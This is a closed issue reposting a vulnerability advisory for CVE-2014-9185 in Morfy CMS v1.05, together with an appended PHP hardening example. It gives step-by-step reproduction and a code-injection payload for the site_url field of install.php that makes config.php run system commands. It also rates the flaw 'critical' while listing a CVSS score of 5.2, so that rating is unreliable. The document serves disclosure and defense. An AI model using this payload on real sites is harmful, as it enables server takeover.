FIXED - Morfy CMS v1.05 - Command Execution Vulnerability #351

Closed
@remove23

References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1367

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9185

CVE-ID:

CVE-2014-9185

Technical Details & Description:

A command execution web vulnerability has been discovered in the official Morfy v1.05 Content Management System.
The vulnerability allows an attacker to execute system-specific commands without authorization, which compromises the online
web application or connected DBMS.

The vulnerability is located in the site_url parameter of the default content management system install.php file.
Remote attackers are able to execute system-specific commands to compromise the application by using malicious
requests that run through the vulnerable site_url value. The request method to inject the code is POST via Add.

The security risk of the vulnerability is estimated as critical, with a CVSS (Common Vulnerability Scoring System)
score of 5.2. Exploitation of the web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the command execution vulnerability results in content management system compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Install

Vulnerable File(s):
[+] install.php

Vulnerable Parameter(s):
[+] site_url

Proof of Concept (PoC):

The vulnerability can be exploited by remote attackers without user interaction or a privileged application user account.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below.

Manual steps to reproduce the security vulnerability ...

  1. Download the morfy content management system
  2. Use the default and access the installation file (install.php)
  3. Inject the following payload website.com}','yibelo'=> eval("system('dir');"), (as website URL) using the Add function
  4. Then navigate to site.com/config.php, which gets executed because the injection results in site_url'='website.com}','yibelo'=>eval("system('dir');"),//',
  5. Successful reproduction of the security vulnerability!

Vulnerable Source: install.php < config.php

./install.php Line 57
$post_site_url = isset($_POST['site_url']) ? $_POST['site_url'] : '';

./install.php Line 64-77
file_put_contents('config.php', "<?php
return array(
'site_url' => '{$post_site_url}',
'site_charset' => 'UTF-8',
'site_timezone' => '{$post_site_timezone}',
'site_theme' => 'default',
'site_title' => '{$post_site_title}',
'site_description' => '{$post_site_description}',
'site_keywords' => '{$post_site_keywords}',
'email' => '{$post_email}',
'plugins' => array(
'markdown',
'sitemap',
), );");

Reference(s):
http://morfy.127.0.0.1:8080/install.php
http://morfy.127.0.0.1:8080/config.php
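
One way to harden the config writer shown above, as an added example that is not Morfy's actual fix and not code from the advisory: validate site_url, emit the array with var_export() instead of string interpolation, and refuse to overwrite an existing config.php. The array keys come from the install.php snippet; the function names build_config_source() and write_config() and the demo input are assumptions made for illustration.

```php
<?php
// Added example, not Morfy's code. Array keys mirror the install.php snippet;
// build_config_source() and write_config() are hypothetical helper names.
function build_config_source(array $post): string
{
    // Accept only an http(s) URL for site_url; anything else is rejected.
    $url = trim((string)($post['site_url'] ?? ''));
    $scheme = strtolower((string)parse_url($url, PHP_URL_SCHEME));
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('site_url must be an http(s) URL');
    }
    $config = [
        'site_url'         => $url,
        'site_charset'     => 'UTF-8',
        'site_timezone'    => (string)($post['site_timezone'] ?? ''),
        'site_theme'       => 'default',
        'site_title'       => (string)($post['site_title'] ?? ''),
        'site_description' => (string)($post['site_description'] ?? ''),
        'site_keywords'    => (string)($post['site_keywords'] ?? ''),
        'email'            => (string)($post['email'] ?? ''),
        'plugins'          => ['markdown', 'sitemap'],
    ];
    // var_export() emits a PHP literal and escapes quotes and backslashes in
    // strings, so a submitted value cannot close the string and append code.
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

function write_config(string $path, array $post): void
{
    $source = build_config_source($post);   // validate before touching disk
    $fh = @fopen($path, 'x');               // mode 'x' fails if the file exists
    if ($fh === false) {
        throw new RuntimeException('config exists or is not writable');
    }
    fwrite($fh, $source);
    fclose($fh);
}

// Constructed demo input: a title containing quotes and array syntax.
$demo = ['site_url' => 'http://example.test',
         'site_title' => "x','k'=>phpversion(),//"];
$tmp = sys_get_temp_dir() . '/config_demo_' . bin2hex(random_bytes(4)) . '.php';
write_config($tmp, $demo);
$loaded = include $tmp;                     // load the generated file back
unlink($tmp);
// The title comes back as the same inert string and no extra key was created.
var_dump($loaded['site_title'] === $demo['site_title'], isset($loaded['k']));
```

Removing or disabling install.php after setup remains necessary, since the installer accepts unauthenticated POST requests.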
